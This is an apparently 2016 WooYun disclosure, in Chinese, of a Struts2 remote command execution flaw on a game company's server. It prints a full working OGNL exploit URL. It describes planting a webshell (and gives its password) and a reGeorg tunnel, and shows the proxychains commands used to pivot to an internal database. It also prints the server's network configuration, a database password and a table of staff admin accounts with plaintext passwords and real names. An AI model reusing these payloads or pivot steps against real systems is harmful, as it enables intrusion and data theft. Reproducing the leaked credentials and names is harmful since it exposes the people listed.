当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0166727

漏洞标题:中国手游某站远程命令执行getshell已内网

相关厂商:cmge.com

漏洞作者: hecate

提交时间:2016-01-02 02:12

修复时间:2016-01-06 10:52

公开时间:2016-01-06 10:52

漏洞类型:系统/服务补丁不及时

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-02: 细节已通知厂商并且等待厂商处理中
2016-01-06: 厂商已经确认,细节仅向厂商公开
2016-01-06: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

厂商打算送我礼物,礼尚往来,新年我就再送个洞给你们吧

详细说明:

Struts2远程命令执行

http://oss.cmge.com/login.action?debug=command&expression=%23f=%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29,%23f.setAccessible%28true%29,%23f.set%28%23_memberAccess,true%29,%23req=@org.apache.struts2.ServletActionContext@getRequest%28%29,%23resp=@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29,%23a=%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b=%23a.getInputStream%28%29,%23c=new%20java.io.InputStreamReader%28%23b%29,%23d=new%20java.io.BufferedReader%28%23c%29,%23e=new%20char[1000],%23d.read%28%23e%29,%23resp.println%28%23e%29,%23resp.close%28%29


111.png


上传一句话 http://oss.cmge.com/config.jsp

Image 1.png


ifconfig
em1       Link encap:Ethernet  HWaddr F8:BC:12:4A:AB:0C  
          inet addr:123.59.73.98  Bcast:123.59.73.111  Mask:255.255.255.240
          inet6 addr: fe80::fabc:12ff:fe4a:ab0c/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:234690100 errors:0 dropped:0 overruns:0 frame:0
          TX packets:191975833 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:111717497757 (104.0 GiB)  TX bytes:55754980927 (51.9 GiB)
          Interrupt:35 
em2       Link encap:Ethernet  HWaddr F8:BC:12:4A:AB:0D  
          inet addr:10.200.130.7  Bcast:10.200.130.255  Mask:255.255.255.0
          inet6 addr: fe80::fabc:12ff:fe4a:ab0d/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:228082396 errors:0 dropped:0 overruns:0 frame:0
          TX packets:328168633 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:102848879805 (95.7 GiB)  TX bytes:173878904275 (161.9 GiB)
          Interrupt:38 
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:69850555 errors:0 dropped:0 overruns:0 frame:0
          TX packets:69850555 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:104502101713 (97.3 GiB)  TX bytes:104502101713 (97.3 GiB)


查看数据库配置文件

#database.jdbc.url=jdbc:mysql://10.200.130.8:3306/goanaysis?useUnicode=true&characterEncoding=UTF-8
database.jdbc.url.shaolin=jdbc:mysql://10.200.130.8:3306/goanaysis?useUnicode=true&characterEncoding=UTF-8
database.jdbc.url.daota=jdbc:mysql://10.200.130.8:3306/goanaysis_daota?useUnicode=true&characterEncoding=UTF-8
database.jdbc.url.xingzhan=jdbc:mysql://10.200.130.8:3306/goanaysis_xzhan?useUnicode=true&characterEncoding=UTF-8
database.user=lhm_rw
database.pwd=w&*&PO96>dLD38L)_(HK1P4^LHM^%a


这密码牛逼
站库分离,上传tunnel.jsp, reGeorg+proxychains代理进入内网,内网存活主机太少,看来被隔离了
直接连接数据库吧

$ python reGeorgSocksProxy.py -p 9527 -u http://oss.cmge.com/tunnel.jsp
$ proxychains mysql -h 10.200.130.8 -u lhm_rw -p


1.png


mysql> select * from MANAGE_USER;


全是弱口令

+-----+-------------+--------+----------------------+-----+------+--------+---------------------+-----------+---------------------+------------------+
| id  | UserName    | Passwd | TrueName             | Sex | Org  | RoleId | CreateTime          | CreatorId | LastUpdateTime      | LastUpdateUserId |
+-----+-------------+--------+----------------------+-----+------+--------+---------------------+-----------+---------------------+------------------+
|  40 | root        | abc321 | 超级管理员           |   1 | 00   | 40     | 2012-12-13 00:00:00 |         0 | 2015-01-14 14:09:28 |               40 |
|  99 | ken         | abc321 | 肖健                 |   1 |      | 75     | 2015-08-28 15:41:56 |        40 | 2015-08-28 15:41:56 |               40 |
| 101 | oscar       | abc321 | 陈韬                 |   1 |      | 75     | 2015-08-30 00:00:00 |        40 | 2015-10-09 16:29:33 |               40 |
| 107 | danny       | abc321 | 许光翔               |   1 |      | 75     | 2015-08-31 09:41:58 |        40 | 2015-08-31 09:41:58 |               40 |
| 109 | luke        | abc321 | 王晓霖               |   1 |      | 75     | 2015-08-31 09:42:31 |        40 | 2015-08-31 09:42:31 |               40 |
| 110 | adam        | abc123 | 梁红明               |   1 |      | 75     | 2015-09-08 09:51:28 |        40 | 2015-09-08 09:51:28 |               40 |
| 111 | thor        | abc321 | 才健楠               |   1 |      | 76     | 2015-10-09 00:00:00 |        40 | 2015-11-13 14:16:15 |               40 |
| 112 | alan        | abc321 | 彭鹏飞               |   1 |      | 75     | 2015-10-10 16:47:42 |        40 | 2015-10-10 16:47:42 |               40 |
| 113 | huanghui    | abc321 | 黄辉                 |   1 |      | 76     | 2015-10-22 00:00:00 |        40 | 2015-11-13 14:15:59 |               40 |
| 114 | will        | abc321 | will                 |   1 |      | 76     | 2015-10-22 00:00:00 |        40 | 2015-11-13 14:15:50 |               40 |
| 116 | chenfeng    | abc321 | 陈峰                 |   1 |      | 76     | 2015-10-22 00:00:00 |        40 | 2015-10-22 16:46:53 |               40 |
| 117 | zhangsonlin | abc321 | 张松林               |   1 |      | 77     | 2015-10-26 18:11:55 |        40 | 2015-10-26 18:11:55 |               40 |
| 118 | liminmin    | abc321 | 李敏敏               |   2 |      | 76     | 2015-10-27 14:38:09 |        40 | 2015-10-27 14:38:09 |               40 |
| 119 | likeyu      | abc123 | 李科宇               |   1 |      | 77     | 2015-11-13 15:06:51 |        40 | 2015-11-13 15:06:51 |               40 |
| 120 | zhangxin    | abc123 | 张鈊                 |   1 |      | 77     | 2015-11-13 15:07:33 |        40 | 2015-11-13 15:07:33 |               40 |
| 121 | huwenming   | abc123 | 胡文明               |   1 |      | 77     | 2015-11-13 15:07:54 |        40 | 2015-11-13 15:07:54 |               40 |
| 122 | chenpeng    | abc123 | 陈鹏                 |   1 |      | 76     | 2015-11-13 00:00:00 |        40 | 2015-12-21 18:08:16 |               40 |
| 123 | fengmingma  | abc321 | fengming.ma@cmge.com |   1 |      | 76     | 2015-12-23 15:30:35 |        40 | 2015-12-23 15:30:35 |               40 |
+-----+-------------+--------+----------------------+-----+------+--------+---------------------+-----------+---------------------+------------------+


129_meitu_1.jpg

漏洞证明:

http://oss.cmge.com/config.jsp
密码 wooyun

修复方案:

升级

版权声明:转载请注明来源 hecate@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-01-06 10:48

厂商回复:

已经通知开发升级补丁,感谢!

最新状态:

2016-01-06:已修复

2016-01-06:已修复

漏洞评价:

评论